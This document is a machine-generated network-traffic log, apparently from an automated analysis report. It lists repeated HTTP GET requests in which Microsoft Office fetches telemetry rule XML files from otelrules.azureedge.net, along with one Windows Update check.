Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=SrGlYPw41PRTGFr&MD=BoDgbOTN HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
